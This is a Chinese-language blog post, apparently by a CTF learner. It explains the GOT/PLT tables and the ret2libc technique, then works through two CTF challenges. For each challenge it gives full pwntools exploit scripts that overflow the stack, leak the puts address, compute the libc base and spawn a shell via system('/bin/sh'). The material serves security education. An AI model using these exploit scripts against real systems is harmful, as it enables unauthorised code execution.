<!DOCTYPE html>
<html lang="zh-CN">
<head>
  <meta charset="UTF-8">
<meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=2">
<meta name="theme-color" content="#222">
<meta name="generator" content="Hexo 5.2.0">


  <link rel="apple-touch-icon" sizes="180x180" href="/images/apple-touch-icon-next.png">
  <link rel="icon" type="image/png" sizes="32x32" href="/images/favicon-32x32-next.png">
  <link rel="icon" type="image/png" sizes="16x16" href="/images/favicon-16x16-next.png">
  <link rel="mask-icon" href="/images/logo.svg" color="#222">

<link rel="stylesheet" href="/css/main.css">



<link rel="stylesheet" href="//cdn.jsdelivr.net/npm/@fortawesome/fontawesome-free@5.15.1/css/all.min.css">
  <link rel="stylesheet" href="//cdn.jsdelivr.net/npm/animate.css@3.1.1/animate.min.css">

<script class="hexo-configurations">
    var NexT = window.NexT || {};
    var CONFIG = {"hostname":"mark0519.github.io","root":"/","scheme":"Pisces","version":"8.0.2","exturl":false,"sidebar":{"position":"left","display":"post","padding":18,"offset":12},"copycode":false,"bookmark":{"enable":false,"color":"#222","save":"auto"},"fancybox":false,"mediumzoom":false,"lazyload":false,"pangu":false,"comments":{"style":"tabs","active":null,"storage":true,"lazyload":false,"nav":null},"motion":{"enable":true,"async":false,"transition":{"post_block":"fadeIn","post_header":"fadeInDown","post_body":"fadeInDown","coll_header":"fadeInLeft","sidebar":"fadeInUp"}},"prism":false,"i18n":{"placeholder":"搜索...","empty":"没有找到任何搜索结果：${query}","hits_time":"找到 ${hits} 个搜索结果（用时 ${time} 毫秒）","hits":"找到 ${hits} 个搜索结果"}};
  </script>

  <meta name="description" content="pwn-libc在众多ROP方法中，重点是要找到system函数的地址来进行ROP，而有的elf源文件中并没有system函数，这是就可以利用libc system 函数属于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。 即使程序有 ASLR 保护，也只是针对于地址中间位进行随机，最低的 12 位并不会发生改变。 所以如果我们知道 libc 中某个函数的地址，那么我们就可">
<meta property="og:type" content="article">
<meta property="og:title" content="pwn-libc">
<meta property="og:url" content="https://mark0519.github.io/2021/01/21/pwn-libc/index.html">
<meta property="og:site_name" content="mark0519的博客">
<meta property="og:description" content="pwn-libc在众多ROP方法中，重点是要找到system函数的地址来进行ROP，而有的elf源文件中并没有system函数，这是就可以利用libc system 函数属于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。 即使程序有 ASLR 保护，也只是针对于地址中间位进行随机，最低的 12 位并不会发生改变。 所以如果我们知道 libc 中某个函数的地址，那么我们就可">
<meta property="og:locale" content="zh_CN">
<meta property="og:image" content="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/4bce71d0afff9fda662855b7058cbff9654bf8a6.png">
<meta property="og:image" content="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/18f4dd2967c898314a3d79a7069a23c91b491c7d.png">
<meta property="og:image" content="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/edaf04621f07afcf30213dc71792080b2bc436c6.png">
<meta property="og:image" content="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/c9c5e372d6870c9dbdf6c9c0b93913f8da086ad2.png">
<meta property="og:image" content="https://img-blog.csdnimg.cn/20190324123353663.png">
<meta property="article:published_time" content="2021-01-21T14:39:33.000Z">
<meta property="article:modified_time" content="2021-01-28T15:33:57.385Z">
<meta property="article:author" content="mark0519">
<meta property="article:tag" content="pwn">
<meta property="article:tag" content="python2">
<meta property="article:tag" content="ctf">
<meta name="twitter:card" content="summary">
<meta name="twitter:image" content="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/4bce71d0afff9fda662855b7058cbff9654bf8a6.png">


<link rel="canonical" href="https://mark0519.github.io/2021/01/21/pwn-libc/">


<script class="page-configurations">
  // https://hexo.io/docs/variables.html
  CONFIG.page = {
    sidebar: "",
    isHome : false,
    isPost : true,
    lang   : 'zh-CN'
  };
</script>

  <title>pwn-libc | mark0519的博客</title>
  






  <noscript>
  <style>
  body { margin-top: 2rem; }

  .use-motion .menu-item,
  .use-motion .sidebar,
  .use-motion .post-block,
  .use-motion .pagination,
  .use-motion .comments,
  .use-motion .post-header,
  .use-motion .post-body,
  .use-motion .collection-header {
    visibility: visible;
  }

  .use-motion .header,
  .use-motion .site-brand-container .toggle,
  .use-motion .footer { opacity: initial; }

  .use-motion .site-title,
  .use-motion .site-subtitle,
  .use-motion .custom-logo-image {
    opacity: initial;
    top: initial;
  }

  .use-motion .logo-line {
    transform: scaleX(1);
  }

  .search-pop-overlay, .sidebar-nav { display: none; }
  .sidebar-panel { display: block; }
  </style>
</noscript>

</head>

<body itemscope itemtype="http://schema.org/WebPage" class="use-motion">
  <div class="headband"></div>

  <main class="main">
    <header class="header" itemscope itemtype="http://schema.org/WPHeader">
      <div class="header-inner"><div class="site-brand-container">
  <div class="site-nav-toggle">
    <div class="toggle" aria-label="切换导航栏">
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
        <span class="toggle-line"></span>
    </div>
  </div>

  <div class="site-meta">

    <a href="/" class="brand" rel="start">
      <i class="logo-line"></i>
      <h1 class="site-title">mark0519的博客</h1>
      <i class="logo-line"></i>
    </a>
  </div>

  <div class="site-nav-right">
    <div class="toggle popup-trigger">
    </div>
  </div>
</div>



<nav class="site-nav">
  <ul class="main-menu menu">
        <li class="menu-item menu-item-home">

    <a href="/" rel="section"><i class="fa fa-home fa-fw"></i>首页</a>

  </li>
        <li class="menu-item menu-item-about">

    <a href="/about/" rel="section"><i class="fa fa-user fa-fw"></i>关于</a>

  </li>
        <li class="menu-item menu-item-tags">

    <a href="/tags/" rel="section"><i class="fa fa-tags fa-fw"></i>标签</a>

  </li>
        <li class="menu-item menu-item-categories">

    <a href="/categories/" rel="section"><i class="fa fa-th fa-fw"></i>分类</a>

  </li>
  </ul>
</nav>




</div>
        
  
  <div class="toggle sidebar-toggle">
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
    <span class="toggle-line"></span>
  </div>

  <aside class="sidebar">

    <div class="sidebar-inner sidebar-nav-active sidebar-toc-active">
      <ul class="sidebar-nav">
        <li class="sidebar-nav-toc">
          文章目录
        </li>
        <li class="sidebar-nav-overview">
          站点概览
        </li>
      </ul>

      <div class="sidebar-panel-container">
        <!--noindex-->
        <section class="post-toc-wrap sidebar-panel">
            <div class="post-toc animated"><ol class="nav"><li class="nav-item nav-level-1"><a class="nav-link" href="#pwn-libc"><span class="nav-number">1.</span> <span class="nav-text">pwn-libc</span></a><ol class="nav-child"><li class="nav-item nav-level-2"><a class="nav-link" href="#got-amp-plt%E8%A1%A8"><span class="nav-number">1.1.</span> <span class="nav-text">got&amp;plt表</span></a></li><li class="nav-item nav-level-2"><a class="nav-link" href="#ctfWiki-ret2libc3"><span class="nav-number">1.2.</span> <span class="nav-text">ctfWiki  ret2libc3</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%9E%90"><span class="nav-number">1.2.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp"><span class="nav-number">1.2.2.</span> <span class="nav-text">exp</span></a></li></ol></li><li class="nav-item nav-level-2"><a class="nav-link" href="#USCTF-ret2libc"><span class="nav-number">1.3.</span> <span class="nav-text">USCTF ret2libc</span></a><ol class="nav-child"><li class="nav-item nav-level-3"><a class="nav-link" href="#%E5%88%86%E6%9E%90-1"><span class="nav-number">1.3.1.</span> <span class="nav-text">分析</span></a></li><li class="nav-item nav-level-3"><a class="nav-link" href="#exp-1"><span class="nav-number">1.3.2.</span> <span class="nav-text">exp</span></a></li></ol></li></ol></li></ol></div>
        </section>
        <!--/noindex-->

        <section class="site-overview-wrap sidebar-panel">
          <div class="site-author site-overview-item animated" itemprop="author" itemscope itemtype="http://schema.org/Person">
  <p class="site-author-name" itemprop="name">mark0519</p>
  <div class="site-description" itemprop="description">我是mark0519，第一次玩博客的小萌新~</div>
</div>
<div class="site-state-wrap site-overview-item animated">
  <nav class="site-state">
      <div class="site-state-item site-state-posts">
          <a href="/archives">
          <span class="site-state-item-count">34</span>
          <span class="site-state-item-name">日志</span>
        </a>
      </div>
      <div class="site-state-item site-state-tags">
            <a href="/tags/">
          
        <span class="site-state-item-count">13</span>
        <span class="site-state-item-name">标签</span></a>
      </div>
  </nav>
</div>
  <div class="links-of-author site-overview-item animated">
      <span class="links-of-author-item">
        <a href="https://github.com/mark0519" title="GitHub → https:&#x2F;&#x2F;github.com&#x2F;mark0519" rel="noopener" target="_blank"><i class="fab fa-github fa-fw"></i>GitHub</a>
      </span>
      <span class="links-of-author-item">
        <a href="mailto:sunjiajun@bupt.edu.cn" title="E-Mail → mailto:sunjiajun@bupt.edu.cn" rel="noopener" target="_blank"><i class="fa fa-envelope fa-fw"></i>E-Mail</a>
      </span>
  </div>



        </section>
      </div>
    </div>
  </aside>
  <div class="sidebar-dimmer"></div>


    </header>

    
  <div class="back-to-top">
    <i class="fa fa-arrow-up"></i>
    <span>0%</span>
  </div>

<noscript>
  <div class="noscript-warning">Theme NexT works best with JavaScript enabled</div>
</noscript>


    <div class="main-inner post posts-expand">
      

      

  


<div class="post-block">
  
  

  <article itemscope itemtype="http://schema.org/Article" class="post-content" lang="zh-CN">
    <link itemprop="mainEntityOfPage" href="https://mark0519.github.io/2021/01/21/pwn-libc/">

    <span hidden itemprop="author" itemscope itemtype="http://schema.org/Person">
      <meta itemprop="image" content="/images/avatar.gif">
      <meta itemprop="name" content="mark0519">
      <meta itemprop="description" content="我是mark0519，第一次玩博客的小萌新~">
    </span>

    <span hidden itemprop="publisher" itemscope itemtype="http://schema.org/Organization">
      <meta itemprop="name" content="mark0519的博客">
    </span>
      <header class="post-header">
        <h1 class="post-title" itemprop="name headline">
          pwn-libc
        </h1>

        <div class="post-meta-container">
          <div class="post-meta">
    <span class="post-meta-item">
      <span class="post-meta-item-icon">
        <i class="far fa-calendar"></i>
      </span>
      <span class="post-meta-item-text">发表于</span>

      <time title="创建时间：2021-01-21 22:39:33" itemprop="dateCreated datePublished" datetime="2021-01-21T22:39:33+08:00">2021-01-21</time>
    </span>
      <span class="post-meta-item">
        <span class="post-meta-item-icon">
          <i class="far fa-calendar-check"></i>
        </span>
        <span class="post-meta-item-text">更新于</span>
        <time title="修改时间：2021-01-28 23:33:57" itemprop="dateModified" datetime="2021-01-28T23:33:57+08:00">2021-01-28</time>
      </span>

  
</div>

        </div>
      </header>

    
    
    
    <div class="post-body" itemprop="articleBody">
        <h1 id="pwn-libc"><a href="#pwn-libc" class="headerlink" title="pwn-libc"></a>pwn-libc</h1><p>在众多ROP方法中，重点是要找到system函数的地址来进行ROP，而有的elf源文件中并没有system函数，这是就可以利用libc</p>
<p>system 函数属于 libc，而 libc.so 动态链接库中的函数之间相对偏移是固定的。</p>
<p>即使程序有 ASLR 保护，也只是针对于地址中间位进行随机，最低的 12 位并不会发生改变。</p>
<p>所以如果我们知道 libc 中某个函数的地址，那么我们就可以确定该程序利用的 libc。进而我们就可以知道 system 函数的地址。</p>
<p>为了得到libc中某函数的地址，多数采用 got 表泄露，即输出某个函数对应的 got 表项的内容。</p>
<p><strong>当然，由于 libc 的延迟绑定机制，我们需要泄漏已经执行过的函数的地址。</strong></p>
<a id="more"></a>

<h2 id="got-amp-plt表"><a href="#got-amp-plt表" class="headerlink" title="got&amp;plt表"></a>got&amp;plt表</h2><p>获取数据段存放函数地址的那一小段代码称为PLT（Procedure Linkage Table）<strong>过程链接表</strong></p>
<p>存放函数地址的数据段称为GOT（Global Offset Table）<strong>全局偏移表</strong>。</p>
<p>当操作系统执行到scanf函数时，一般的调用即为：<strong>call scanf —&gt; scanf的plt表 —&gt;scanf的got表</strong></p>
<p>即间接寻址可简化为下图</p>
<p><img src="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/4bce71d0afff9fda662855b7058cbff9654bf8a6.png"></p>
<h2 id="ctfWiki-ret2libc3"><a href="#ctfWiki-ret2libc3" class="headerlink" title="ctfWiki  ret2libc3"></a>ctfWiki  ret2libc3</h2><h3 id="分析"><a href="#分析" class="headerlink" title="分析"></a>分析</h3><p>先分析保护</p>
<p><img src="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/18f4dd2967c898314a3d79a7069a23c91b491c7d.png"></p>
<p>反汇编</p>
<p><img src="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/edaf04621f07afcf30213dc71792080b2bc436c6.png"></p>
<p>可以看出，源程序仍旧开启了堆栈不可执行保护。进而查看源码，发现程序的 bug 仍然是栈溢出</p>
<p>此外，在得到 libc 之后，其实 libc 中也是有 /bin/sh 字符串的，所以我们可以一起获得 /bin/sh 字符串的地址。</p>
<p>这里我们泄露 __libc_start_main 的地址，这是因为它是程序最初被执行的地方。基本利用思路如下</p>
<ul>
<li>泄露 __libc_start_main 地址</li>
<li>获取 libc 版本</li>
<li>获取 system 地址与 /bin/sh 的地址</li>
<li>再次执行源程序</li>
<li>触发栈溢出执行 system(‘/bin/sh’)</li>
</ul>
<p>下面逐步分析</p>
<p>首先利用程序中的puts函数可以打印我们需要的东西，且puts也是程序必然会使用的函数，即我们可以利用泄露puts的地址来计算system函数的地址。</p>
<p>故利用gets函数的栈溢出漏洞，覆盖gets函数的返回地址为puts，puts的返回地址为_start函数（因为我们需要执行程序两次，第一次泄露libc，第二次执行ROP），puts的参数为puts函数的got表</p>
<p>通过gdb调试得知需要覆盖112个字符（含ebp）</p>
<p><img src="https://images.weserv.nl/?url=https://i0.hdslb.com/bfs/article/c9c5e372d6870c9dbdf6c9c0b93913f8da086ad2.png"></p>
<p>则得出payload1</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload1 = <span class="string">&quot;zbrnb&quot;</span>.ljust(<span class="number">112</span>,<span class="string">&#x27;a&#x27;</span>)  + p32(puts_plt) + p32(start_addr) + p32(puts_got)</span><br></pre></td></tr></table></figure>

<p>之后程序便会打印出puts的got表，使用u32解包</p>
<p>之后libc.address即为得到的地址减去libc.symbols[‘puts’]</p>
<p>即得到payload2</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload2 = <span class="string">&quot;zbrnb&quot;</span>.ljust(<span class="number">112</span>,<span class="string">&#x27;b&#x27;</span>) + p32(system_addr) + <span class="string">&#x27;aaaa&#x27;</span> + p32(binsh_addr)</span><br></pre></td></tr></table></figure>

<h3 id="exp"><a href="#exp" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br><span class="line">23</span><br><span class="line">24</span><br><span class="line">25</span><br><span class="line">26</span><br></pre></td><td class="code"><pre><span class="line"><span class="comment">#ctfWiki上的给的exp在本地跑不通，我也不知道为啥</span></span><br><span class="line"><span class="comment">#这是一个可以本地跑通的脚本</span></span><br><span class="line"></span><br><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line">sh = process(<span class="string">&#x27;./ret2libc3&#x27;</span>)</span><br><span class="line">elf = ELF(<span class="string">&#x27;./ret2libc3&#x27;</span>)</span><br><span class="line">libc = elf.libc</span><br><span class="line"></span><br><span class="line">puts_plt = elf.plt[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">puts_got = elf.got[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">start_addr = elf.symbols[<span class="string">&#x27;_start&#x27;</span>]</span><br><span class="line"></span><br><span class="line">payload = <span class="string">&#x27;A&#x27;</span> * <span class="number">112</span> + p32(puts_plt) + p32(start_addr) + p32(puts_got)</span><br><span class="line"></span><br><span class="line">sh.sendlineafter(<span class="string">&quot;Can you find it !?&quot;</span>, payload)</span><br><span class="line">puts_addr = u32(sh.recv(<span class="number">4</span>)) <span class="comment">#32位程序，地址占4个字节</span></span><br><span class="line"></span><br><span class="line"></span><br><span class="line">libc.address = puts_addr - libc.symbols[<span class="string">&#x27;puts&#x27;</span>]</span><br><span class="line">system_addr = libc.symbols[<span class="string">&#x27;system&#x27;</span>]</span><br><span class="line">binsh_addr = <span class="built_in">next</span>(libc.search(<span class="string">&#x27;/bin/sh&#x27;</span>))</span><br><span class="line"></span><br><span class="line"></span><br><span class="line">payload2 = <span class="string">&#x27;B&#x27;</span> * <span class="number">112</span> + p32(system_addr) + <span class="string">&#x27;CCCC&#x27;</span> + p32(binsh_addr)</span><br><span class="line">sh.sendline(payload2)</span><br><span class="line">sh.interactive()</span><br></pre></td></tr></table></figure>

<h2 id="USCTF-ret2libc"><a href="#USCTF-ret2libc" class="headerlink" title="USCTF ret2libc"></a>USCTF ret2libc</h2><h3 id="分析-1"><a href="#分析-1" class="headerlink" title="分析"></a>分析</h3><p>反汇编寻找泄漏点</p>
<p><img src="https://img-blog.csdnimg.cn/20190324123353663.png"></p>
<p>即发现puts函数可作为泄露函数</p>
<p>栈溢出覆盖read的返回地址，得到payload1</p>
<p>再有ida寻找到main函数的地址</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload1=<span class="string">&#x27;a&#x27;</span>*<span class="number">112</span>+p32(elf.plt[<span class="string">&#x27;puts&#x27;</span>])+p32(main)+p32(elf.got[<span class="string">&#x27;puts&#x27;</span>])</span><br></pre></td></tr></table></figure>

<p>之后接收puts的地址，由LibcSearcher包提供的方法找到对应libc版本</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">libc =LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts)  <span class="comment">#需要from LibcSearcher import *</span></span><br></pre></td></tr></table></figure>

<p>随后计算偏移量得到paylod2</p>
<figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br></pre></td><td class="code"><pre><span class="line">payload2=payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">112</span>+p32(system)+<span class="string">&quot;aaaa&quot;</span>+p32(bin_sh)</span><br></pre></td></tr></table></figure>

<p>即可得到shell</p>
<h3 id="exp-1"><a href="#exp-1" class="headerlink" title="exp"></a>exp</h3><figure class="highlight python"><table><tr><td class="gutter"><pre><span class="line">1</span><br><span class="line">2</span><br><span class="line">3</span><br><span class="line">4</span><br><span class="line">5</span><br><span class="line">6</span><br><span class="line">7</span><br><span class="line">8</span><br><span class="line">9</span><br><span class="line">10</span><br><span class="line">11</span><br><span class="line">12</span><br><span class="line">13</span><br><span class="line">14</span><br><span class="line">15</span><br><span class="line">16</span><br><span class="line">17</span><br><span class="line">18</span><br><span class="line">19</span><br><span class="line">20</span><br><span class="line">21</span><br><span class="line">22</span><br></pre></td><td class="code"><pre><span class="line"><span class="keyword">from</span> pwn <span class="keyword">import</span> *</span><br><span class="line"><span class="keyword">from</span> LibcSearcher <span class="keyword">import</span> *</span><br><span class="line"></span><br><span class="line">p=process(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">elf=ELF(<span class="string">&#x27;./pwn&#x27;</span>)</span><br><span class="line">main=<span class="number">0x80484FD</span></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">112</span>+p32(elf.plt[<span class="string">&#x27;puts&#x27;</span>])+p32(main)+p32(elf.got[<span class="string">&#x27;puts&#x27;</span>])</span><br><span class="line"></span><br><span class="line">p.recvuntil(<span class="string">&#x27;try\n&#x27;</span>)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">puts=u32(p.recv(<span class="number">4</span>))</span><br><span class="line"></span><br><span class="line">libc = LibcSearcher(<span class="string">&#x27;puts&#x27;</span>,puts)</span><br><span class="line"></span><br><span class="line">libcbase=puts-libc.dump(<span class="string">&#x27;puts&#x27;</span>)</span><br><span class="line">system=libcbase+libc.dump(<span class="string">&#x27;system&#x27;</span>)</span><br><span class="line">bin_sh=libcbase+libc.dump(<span class="string">&#x27;str_bin_sh&#x27;</span>)</span><br><span class="line"></span><br><span class="line">payload=<span class="string">&#x27;a&#x27;</span>*<span class="number">104</span>+p32(system)+<span class="string">&quot;aaaa&quot;</span>+p32(bin_sh)</span><br><span class="line">p.sendline(payload)</span><br><span class="line">p.interactive()</span><br><span class="line"></span><br></pre></td></tr></table></figure>


    </div>

    
    
    

    <footer class="post-footer">
          

<div class="post-copyright">
<ul>
  <li class="post-copyright-author">
      <strong>本文作者： </strong>mark0519
  </li>
  <li class="post-copyright-link">
      <strong>本文链接：</strong>
      <a href="https://mark0519.github.io/2021/01/21/pwn-libc/" title="pwn-libc">https://mark0519.github.io/2021/01/21/pwn-libc/</a>
  </li>
  <li class="post-copyright-license">
    <strong>版权声明： </strong>本博客所有文章除特别声明外，均采用 <a href="https://creativecommons.org/licenses/by-nc-sa/4.0/" rel="noopener" target="_blank"><i class="fab fa-fw fa-creative-commons"></i>BY-NC-SA</a> 许可协议。转载请注明出处！
  </li>
</ul>
</div>

          <div class="post-tags">
              <a href="/tags/pwn/" rel="tag"># pwn</a>
              <a href="/tags/python2/" rel="tag"># python2</a>
              <a href="/tags/ctf/" rel="tag"># ctf</a>
          </div>

        

          <div class="post-nav">
            <div class="post-nav-item">
                <a href="/2021/01/15/pwn-shellcode/" rel="prev" title="pwn-shellcode">
                  <i class="fa fa-chevron-left"></i> pwn-shellcode
                </a>
            </div>
            <div class="post-nav-item">
                <a href="/2021/02/21/pwn-ret2csu/" rel="next" title="pwn-ret2csu">
                  pwn-ret2csu <i class="fa fa-chevron-right"></i>
                </a>
            </div>
          </div>
    </footer>
  </article>
</div>






      

<script>
  window.addEventListener('tabs:register', () => {
    let { activeClass } = CONFIG.comments;
    if (CONFIG.comments.storage) {
      activeClass = localStorage.getItem('comments_active') || activeClass;
    }
    if (activeClass) {
      const activeTab = document.querySelector(`a[href="#comment-${activeClass}"]`);
      if (activeTab) {
        activeTab.click();
      }
    }
  });
  if (CONFIG.comments.storage) {
    window.addEventListener('tabs:click', event => {
      if (!event.target.matches('.tabs-comment .tab-content .tab-pane')) return;
      const commentClass = event.target.classList[1];
      localStorage.setItem('comments_active', commentClass);
    });
  }
</script>

    </div>
  </main>

  <footer class="footer">
    <div class="footer-inner">
      

      

<div class="copyright">
  
  &copy; 
  <span itemprop="copyrightYear">2021</span>
  <span class="with-love">
    <i class="fa fa-heart"></i>
  </span>
  <span class="author" itemprop="copyrightHolder">mark0519</span>
</div> <!--
  <div class="powered-by">由 <a href="https://hexo.io/" class="theme-link" rel="noopener" target="_blank">Hexo</a> & <a href="https://theme-next.js.org/pisces/" class="theme-link" rel="noopener" target="_blank">NexT.Pisces</a> 强力驱动
  </div> -->

    </div>
  </footer>

  
  <script src="//cdn.jsdelivr.net/npm/animejs@3.2.1/lib/anime.min.js"></script>
<script src="/js/utils.js"></script><script src="/js/motion.js"></script><script src="/js/next-boot.js"></script>

  


















  








  

  

</body>
</html>
